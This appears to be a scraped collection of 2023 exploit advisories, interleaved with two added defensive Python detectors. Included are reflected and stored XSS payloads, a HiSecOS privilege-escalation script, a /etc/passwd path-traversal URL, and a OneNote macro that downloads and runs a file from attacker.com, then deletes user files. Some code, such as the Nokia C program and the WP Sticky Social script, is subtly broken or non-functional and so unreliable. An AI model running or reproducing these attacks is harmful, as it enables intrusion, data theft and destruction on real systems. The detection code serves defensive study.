<pre><code>CraCkEr<br />THE CRACK OF ETERNAL MIGHT<br /><br />From The Ashes and Dust Rises An Unimaginable crack....<br /><br />[ Vulnerability ]<br /><br />Author    : CraCkEr<br />Website   : https://www.codester.com/items/33819/<br />Vendor    : Rfcoding<br />Software  : Hospital Management System 1.0<br />Vuln Type : Stored XSS<br />Impact    : Manipulate the content of the site<br /><br />Release Notes:<br />══════════════<br /><br />Allows an attacker to inject malicious code into the website, giving the ability to steal sensitive information, manipulate data, and launch additional attacks.<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL, MoizSid09<br /><br /> CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br />© CraCkEr 2023<br /><br /><br />## Stored XSS<br /><br /><br />POST /home/appointment/create HTTP/2<br /><br />-----------------------------262834650130522416703979271446<br />Content-Disposition: form-data; name="name"<br /><br />[XSS Payload]<br />-----------------------------262834650130522416703979271446<br />Content-Disposition: form-data; name="phone"<br /><br />[XSS Payload]<br />-----------------------------262834650130522416703979271446<br /><br /><br />## Steps to Reproduce:<br /><br />1. Visit Website (as Guest) and Click on [Appointment] on this Path (https://website/home/appointment)<br />2. Inject [XSS Payload] in Name<br />3. Inject [XSS Payload] in Phone<br />4. Fill Anything in the Other Fields<br />5. Press Submit<br /><br />6. When the ADMIN visits [Patient] to check [Appointment Scheduling] on this Path (https://website/admin/patient)<br />7. XSS will fire and execute in his browser<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>## Title: Microsoft OneNote (Version 2305 Build 16.0.16501.20074) 64-bit - Spoofing Vulnerability<br />## Author: nu11secur1ty<br />## Date: 06.22.2023<br />## Vendor: https://www.microsoft.com/<br />## Software: https://www.microsoft.com/en/microsoft-365/onenote/digital-note-taking-app<br />## Reference: https://portswigger.net/kb/issues/00400c00_input-returned-in-response-reflected<br /><br />## Description:<br />Microsoft OneNote is vulnerable to spoofing attacks. The malicious<br />user can trick the victim into clicking on a very maliciously crafted<br />URL or download some other malicious file and execute it. When this<br />happens the game will be over for the victim and his computer will be<br />compromised.<br />Exploiting the vulnerability requires that a user open a specially<br />crafted file with an affected version of Microsoft OneNote and then<br />click on a specially crafted URL to be compromised by the attacker.<br /><br />STATUS: 6.5 MEDIUM Vulnerability<br /><br />[+]Exploit:<br />```vbs<br />Sub AutoOpen()<br /> Call Shell("cmd.exe /S /c" & "curl -s<br />https://attacker.com/kurec.badass > kurec.badass && .\kurec.badass",<br />vbNormalFocus)<br />End Sub<br /><br />```<br />[+]Inside-exploit<br />```<br />@echo off<br />del /s /q C:%HOMEPATH%\IMPORTANT\*<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-33140)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/06/cve-2023-33140.html)<br /><br />## Time spend:<br />01:15:00<br /><br /><br /></code></pre>
<pre><code># Exploit Title: HiSecOS 04.0.01 - Privilege Escalation<br /># Google Dork: HiSecOS Web Server Vulnerability Allows User Role Privilege Escalation<br /># Date: 21.06.2023<br /># Exploit Author: dreizehnutters<br /># Vendor Homepage: https://dam.belden.com/dmm3bwsv3/assetstream.aspx?assetid=15437&mediaformatid=50063&destinationid=10016<br /># Version: HiSecOS-04.0.01 or lower<br /># Tested on: HiSecOS-04.0.01<br /># CVE: BSECV-2021-07<br /><br />#!/bin/bash<br /><br />if [[ $# -lt 3 ]]; then<br /> echo "Usage: $0 <IP> <USERNAME> <PASSWORD>"<br /> exit 1<br />fi<br /><br />target="$1"<br />user="$2"<br />pass="$3"<br /><br /># Craft basic header<br />auth=$(echo -ne "$user:$pass" | base64)<br /><br /># Convert to ASCII hex<br />blob=$(printf "$user" | xxd -ps -c 1)<br /><br /># Generate XML payload ('15' -> admin role)<br />gen_payload() {<br /> cat <<EOF<br /><rpc xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:x-mops:1.0 ../mops.xsd" message-id="20"><br /> <mibOperation xmlns="urn:x-mops:1.0"><br /> <edit-config><br /> <MIBData><br /> <MIB name="HM2-USERMGMT-MIB"><br /> <Node name="hm2UserConfigEntry"><br /> <Index><br /> <Attribute name="hm2UserName">$blob</Attribute><br /> </Index><br /> <Set name="hm2UserAccessRole">15</Set><br /> </Node><br /> </MIB><br /> </MIBData><br /> </edit-config><br /> </mibOperation><br /></rpc><br />EOF<br />}<br /><br />curl -i -s -k -X POST \<br /> -H "content-type: application/xml" \<br /> -H "authorization: Basic ${auth}" \<br /> --data-binary "$(gen_payload)" \<br /> "https://${target}/mops_data"<br /><br />echo "[*] $user is now an admin"<br /><br /></code></pre>
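<p>Detection-side view of the request above, as an added example that is not part of the advisory or of vendor code: it flags <code>/mops_data</code> edit-config bodies in which the account named in the Basic <code>Authorization</code> header writes <code>hm2UserAccessRole</code> on its own <code>hm2UserConfigEntry</code>. It assumes decrypted request headers and bodies are available (for example from a TLS-terminating proxy); the function names and the sample request are constructed here.</p>

```python
import base64
import xml.etree.ElementTree as ET

MOPS = "{urn:x-mops:1.0}"  # namespace declared on <mibOperation> in the request


def basic_auth_user(header):
    """Return the username from an 'Authorization: Basic ...' value, or None."""
    scheme, _, token = header.strip().partition(" ")
    if scheme.lower() != "basic":
        return None
    try:
        raw = base64.b64decode(token.strip(), validate=True)
        return raw.decode("utf-8").partition(":")[0]
    except ValueError:  # malformed base64 or non-UTF-8 credentials
        return None


def hex_to_name(blob):
    """hm2UserName is sent as ASCII hex, possibly one byte per line."""
    try:
        return bytes.fromhex("".join(blob.split())).decode("utf-8")
    except ValueError:
        return None


def role_changes(body):
    """List (target_user, new_role) for each hm2UserAccessRole write in the body."""
    if "<!DOCTYPE" in body or "<!ENTITY" in body:
        raise ValueError("DTD in request body, refusing to parse")
    changes = []
    for node in ET.fromstring(body).iter(MOPS + "Node"):
        if node.get("name") != "hm2UserConfigEntry":
            continue
        names = [hex_to_name(a.text or "") for a in node.iter(MOPS + "Attribute")
                 if a.get("name") == "hm2UserName"]
        target = names[0] if names else None
        for s in node.iter(MOPS + "Set"):
            if s.get("name") == "hm2UserAccessRole":
                changes.append((target, (s.text or "").strip()))
    return changes


def self_role_changes(auth_header, body):
    """Role writes where the authenticated account is also the account changed."""
    caller = basic_auth_user(auth_header)
    if caller is None:
        return []
    return [(user, role) for user, role in role_changes(body) if user == caller]


def sample_request(caller, target, role):
    """Constructed request in the shape shown in the advisory (not captured traffic)."""
    auth = "Basic " + base64.b64encode(f"{caller}:x".encode()).decode()
    body = f"""<rpc xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="20">
  <mibOperation xmlns="urn:x-mops:1.0"><edit-config><MIBData>
    <MIB name="HM2-USERMGMT-MIB"><Node name="hm2UserConfigEntry">
      <Index><Attribute name="hm2UserName">{target.encode().hex()}</Attribute></Index>
      <Set name="hm2UserAccessRole">{role}</Set>
    </Node></MIB>
  </MIBData></edit-config></mibOperation>
</rpc>"""
    return auth, body


if __name__ == "__main__":
    # An account changing its own role is reported; one account editing another is not.
    print(self_role_changes(*sample_request("operator", "operator", "15")))
    print(self_role_changes(*sample_request("admin", "operator", "15")))
```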
<pre><code>Author    : CraCkEr<br />Website   : https://www.netartmedia.net/online-school/<br />Vendor    : NetArt Media<br />Software  : PHP Online School 1.0<br />Vuln Type : Reflected XSS - Stored XSS<br />Impact    : Manipulate the content of the site<br /><br />Release Notes:<br />══════════════<br /><br />Reflected XSS<br /><br />The attacker can send the victim a link containing a malicious URL in an email or instant message, and can perform a wide variety of actions, such as stealing the victim's session token or login credentials.<br /><br />Stored XSS<br /><br />Allows an attacker to inject malicious code into the website, giving the ability to steal sensitive information, manipulate data, and launch additional attacks.<br /><br /><br />Path: /index.php<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/users/index.php?category=home&action=welcome&category=home&action=welcome&order=date&order_type=desc&e9m9f"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"fgok8=1<br /><br /><br />## Stored XSS<br /><br /><br />POST /online-school/users/index.php HTTP/2<br /><br />-----------------------------124654322118707720774051212206<br />Content-Disposition: form-data; name="title"<br /><br />Any Title<br />-----------------------------124654322118707720774051212206<br />Content-Disposition: form-data; name="post_message"<br /><br /><br />-----------------------------124654322118707720774051212206<br />Content-Disposition: form-data; name="message"<br /><br />[XSS Payload]<br />-----------------------------124654322118707720774051212206<br /><br /><br />## Steps to Reproduce:<br /><br />1. Sign up & Login in any Normal User Mode<br />2. Go to [My Question] Click [Ask a New Question] on this Path (https://website/users/index.php?category=tickets&action=new)<br />3. Select Any Subject<br />4. Write any Title<br />5. Inject your [XSS Payload] in "Message Box"<br />6. Select Any Priority<br />7. Press Submit<br /><br />8. When the ADMIN checks Student Questions on this Path (https://website/admin/index.php?category=tickets&action=new)<br />9. XSS will fire and execute in his browser<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>Author    : CraCkEr<br />Website   : https://www.netartmedia.net/mall/<br />Vendor    : NetArt Media<br />Software  : PHP Mall 5.0<br />Vuln Type : Reflected XSS<br />Impact    : Manipulate the content of the site<br /><br />Release Notes:<br />══════════════<br /><br />The attacker can send the victim a link containing a malicious URL in an email or instant message, and can perform a wide variety of actions, such as stealing the victim's session token or login credentials.<br /><br /><br />Path: /index.php<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://website/index.php?proceed_search=1&mod=products&lang=en&search_by=&proceed_search=1&mod=products&lang=en&search_by=&num=2&iv3s6"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"b6yhe=1<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>// Exploit Title: Nokia ASIKA 7.13.52 - Hard-coded private key disclosure<br />// Date: 2023-06-20<br />// Exploit Author: Amirhossein Bahramizadeh<br />// Category : Hardware<br />// Vendor Homepage: https://www.nokia.com/about-us/security-and-privacy/product-security-advisory/cve-2023-25187/<br />// Version: 7.13.52 (REQUIRED)<br />// Tested on: Windows/Linux<br />// CVE : CVE-2023-25187<br /><br />#include <stdio.h><br />#include <stdlib.h><br />#include <string.h><br />#include <errno.h><br />#include <unistd.h><br />#include <netinet/in.h><br />#include <arpa/inet.h><br />#include <sys/socket.h><br />#include <sys/types.h><br />#include <sys/wait.h><br />#include <signal.h><br /><br />// The IP address of the vulnerable device<br />char *host = "192.168.1.1";<br /><br />// The default SSH port number<br />int port = 22;<br /><br />// The username and password for the BTS service user account<br />char *username = "service_user";<br />char *password = "password123";<br /><br />// The IP address of the attacker's machine<br />char *attacker_ip = "10.0.0.1";<br /><br />// The port number to use for the MITM attack<br />int attacker_port = 2222;<br /><br />// The maximum length of a message<br />#define MAX_LEN 1024<br /><br />// Forward data between two sockets<br />void forward_data(int sock1, int sock2)<br />{<br /> char buffer[MAX_LEN];<br /> ssize_t bytes_read;<br /><br /> while ((bytes_read = read(sock1, buffer, MAX_LEN)) > 0)<br /> {<br /> write(sock2, buffer, bytes_read);<br /> }<br />}<br /><br />int main()<br />{<br /> int sock, pid1, pid2;<br /> struct sockaddr_in addr;<br /> char *argv[] = {"/usr/bin/ssh", "-l", username, "-p", "2222", "-o", "StrictHostKeyChecking=no", "-o", "UserKnownHostsFile=/dev/null", "-o", "PasswordAuthentication=no", "-o", "PubkeyAuthentication=yes", "-i", "/path/to/private/key", "-N", "-R", "2222:localhost:22", host, NULL};<br /><br /> // Create a new socket<br /> sock = socket(AF_INET, SOCK_STREAM, 0);<br /><br /> 
// Set the address to connect to<br /> memset(&addr, 0, sizeof(addr));<br /> addr.sin_family = AF_INET;<br /> addr.sin_port = htons(port);<br /> inet_pton(AF_INET, host, &addr.sin_addr);<br /><br /> // Connect to the vulnerable device<br /> if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) < 0)<br /> {<br /> fprintf(stderr, "Error connecting to %s:%d: %s\n", host, port, strerror(errno));<br /> exit(1);<br /> }<br /><br /> // Send the SSH handshake<br /> write(sock, "SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.10\r\n", 42);<br /> read(sock, NULL, 0);<br /><br /> // Send the username<br /> write(sock, username, strlen(username));<br /> write(sock, "\r\n", 2);<br /> read(sock, NULL, 0);<br /><br /> // Send the password<br /> write(sock, password, strlen(password));<br /> write(sock, "\r\n", 2);<br /><br /> // Wait for the authentication to complete<br /> sleep(1);<br /><br /> // Start an SSH client on the attacker's machine<br /> pid1 = fork();<br /> if (pid1 == 0)<br /> {<br /> execv("/usr/bin/ssh", argv);<br /> exit(0);<br /> }<br /><br /> // Start an SSH server on the attacker's machine<br /> pid2 = fork();<br /> if (pid2 == 0)<br /> {<br /> execl("/usr/sbin/sshd", "/usr/sbin/sshd", "-p", "2222", "-o", "StrictModes=no", "-o", "PasswordAuthentication=no", "-o", "PubkeyAuthentication=yes", "-o", "AuthorizedKeysFile=/dev/null", "-o", "HostKey=/path/to/private/key", NULL);<br /> exit(0);<br /> }<br /><br /> // Wait for the SSH server to start<br /> sleep(1);<br /><br /> // Forward data between the client and the server<br /> pid1 = fork();<br /> if (pid1 == 0)<br /> {<br /> forward_data(sock, STDIN_FILENO);<br /> exit(0);<br /> }<br /> pid2 = fork();<br /> if (pid2 == 0)<br /> {<br /> forward_data(STDOUT_FILENO, sock);<br /> exit(0);<br /> }<br /><br /> // Wait for the child processes to finish<br /> waitpid(pid1, NULL, 0);<br /> waitpid(pid2, NULL, 0);<br /><br /> // Close the socket<br /> close(sock);<br /><br /> return 0;<br />}<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: Super Socializer 7.13.52 - Reflected XSS<br /># Dork: inurl: https://example.com/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com<br /># Date: 2023-06-20<br /># Exploit Author: Amirhossein Bahramizadeh<br /># Category : Webapps<br /># Vendor Homepage: https://wordpress.org/plugins/super-socializer<br /># Version: 7.13.52 (REQUIRED)<br /># Tested on: Windows/Linux<br /># CVE : CVE-2023-2779<br />import requests<br /><br /># The URL of the vulnerable AJAX endpoint<br />url = "https://example.com/wp-admin/admin-ajax.php"<br /><br /># The vulnerable parameter that is not properly sanitized and escaped<br />vulnerable_param = "<img src=x onerror=alert(document.domain)>"<br /><br /># The payload that exploits the vulnerability<br />payload = {"action": "the_champ_sharing_count", "urls[" + vulnerable_param + "]": "https://www.google.com"}<br /><br /># Send a POST request to the vulnerable endpoint with the payload<br />response = requests.post(url, data=payload)<br /><br /># Check if the payload was executed by searching for the injected script tag<br />if "<img src=x onerror=alert(document.domain)>" in response.text:<br /> print("Vulnerability successfully exploited")<br />else:<br /> print("Vulnerability not exploitable")<br /> <br /><br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Accent Microcomputers CMS v 2.4 Directory Traversal Vulnerability |<br />| # Author : indoushka |<br />| # Telegram : @indoushka |<br />| # Tested on : windows 10 Français V.(Pro) |<br />| # Vendor : http://www.accent.com.pl |<br />| # Dork : n/a |<br />====================================================================================================================================<br /><br /><br />poc :<br /><br />[+] Dorking in Google or other search engine<br /><br />[+] use payload : ../../../../../../../../../etc/passwd<br /><br />http://127.0.0.1/www/mmrtradingpl/index.php?id=50&file=../../../../../../../../../etc/passwd<br /><br />http://127.0.0.1/www/transcomfortpl/index.php?id=50&file=../../../../../../../../../etc/passwd<br /><br />=====Greetings to :=========================================================================================================================<br />| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br />============================================================================================================================================</code></pre>
<pre><code>Author    : CraCkEr<br />Website   : https://www.netartmedia.net/autodealer/<br />Vendor    : NetArt Media<br />Software  : PHP Car Dealer 3.0<br />Vuln Type : Reflected XSS<br />Impact    : Manipulate the content of the site<br /><br />Release Notes:<br />══════════════<br /><br />The attacker can send the victim a link containing a malicious URL in an email or instant message, and can perform a wide variety of actions, such as stealing the victim's session token or login credentials.<br /><br /><br />Path: /index.php<br /><br />URL parameter is vulnerable to RXSS<br /><br />https://www.website/index.php?page=en_Latest%20Listings&page=en_Latest%20Listings&order_by=price_max&bprcc"onmouseover="confirm(1)"style="position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b"madvv=1<br /><br /><br />[-] Done<br /></code></pre>
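<p>The three NetArt Media reports (PHP Online School, PHP Mall, PHP Car Dealer) and the Super Socializer report above share one trait: the markup travels in a query parameter's <em>name</em>, not its value. The following is an added example, not code from any of the advisories or vendors, that scans access-log lines for parameter names that fail an identifier policy; the policy regex, function names and log lines are assumptions constructed for illustration.</p>

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed policy: parameter names are plain identifiers, optionally followed by
# PHP-style array brackets (urls[0], filter[color]). Tune per application.
SAFE_NAME = re.compile(r"[A-Za-z0-9_.-]+(\[[A-Za-z0-9_.-]*\])*")
# Characters that let a reflected name close an attribute or open a tag.
BREAKOUT = re.compile(r"[\"'<>]")
# Request portion of a common/combined-format access log line.
REQUEST = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_names(target):
    """Return the decoded parameter names in a request target that fail the policy."""
    pairs = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    return [name for name, _ in pairs if not SAFE_NAME.fullmatch(name)]


def scan(lines):
    """Yield (client_ip, path, name, severity) for each offending parameter name."""
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue  # not a request line in the expected format
        path = urlsplit(m["target"]).path
        for name in suspicious_names(m["target"]):
            severity = "high" if BREAKOUT.search(name) else "review"
            yield m["ip"], path, name, severity


# Constructed log lines. Lines 2 and 3 carry the percent-encoded form of the
# requests shown in the advisories; lines 1 and 4 are ordinary traffic.
SAMPLE_LOG = [
    '198.51.100.4 - - [20/Jun/2023:09:14:02 +0000] "GET /index.php?mod=products&lang=en&num=2 HTTP/1.1" 200 8120',
    '203.0.113.9 - - [20/Jun/2023:09:15:40 +0000] "GET /index.php?mod=products&num=2&iv3s6%22onmouseover=%22confirm(1)%22style=%22position:absolute%3bwidth:100%25%22b6yhe=1 HTTP/1.1" 200 8342',
    '203.0.113.9 - - [20/Jun/2023:09:16:05 +0000] "GET /wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[%3Cimg%20src%3Dx%20onerror%3Dalert%28document%2Edomain%29%3E]=https://www.google.com HTTP/1.1" 200 97',
    '198.51.100.4 - - [20/Jun/2023:09:17:11 +0000] "GET /search?filter[color]=red&page=2 HTTP/1.1" 200 4410',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

<p>Access logs only record the query string, so names sent in a POST body need the same check applied at a proxy or WAF that sees the body.</p>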
<pre><code># Exploit Title: WP Sticky Social 1.0.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting (XSS)<br /># Dork: inurl:~/admin/views/admin.php<br /># Date: 2023-06-20<br /># Exploit Author: Amirhossein Bahramizadeh<br /># Category : Webapps<br /># Vendor Homepage: https://wordpress.org/plugins/wp-sticky-social<br /># Version: 1.0.1 (REQUIRED)<br /># Tested on: Windows/Linux<br /># CVE : CVE-2023-3320<br /><br />import requests<br />import hashlib<br />import time<br /><br /># Set the target URL<br />url = "http://example.com/wp-admin/admin.php?page=wpss_settings"<br /><br /># Set the user agent string<br />user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"<br /><br /># Generate the nonce value<br />nonce = hashlib.sha256(str(time.time()).encode('utf-8')).hexdigest()<br /><br /># Set the data payload<br />payload = {<br /> "wpss_nonce": nonce,<br /> "wpss_setting_1": "value_1",<br /> "wpss_setting_2": "value_2",<br /> # Add additional settings as needed<br />}<br /><br /># Set the request headers<br />headers = {<br /> "User-Agent": user_agent,<br /> "Referer": url,<br /> "Cookie": "wordpress_logged_in=1; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26uploader%3Dwp-plupload%26urlbutton%3Dfile; wp-settings-time-1=1495271983",<br /> # Add additional headers as needed<br />}<br /><br /># Send the POST request<br />response = requests.post(url, data=payload, headers=headers)<br /><br /># Check the response status code<br />if response.status_code == 200:<br /> print("Request successful")<br />else:<br /> print("Request failed")<br /> <br /><br /></code></pre>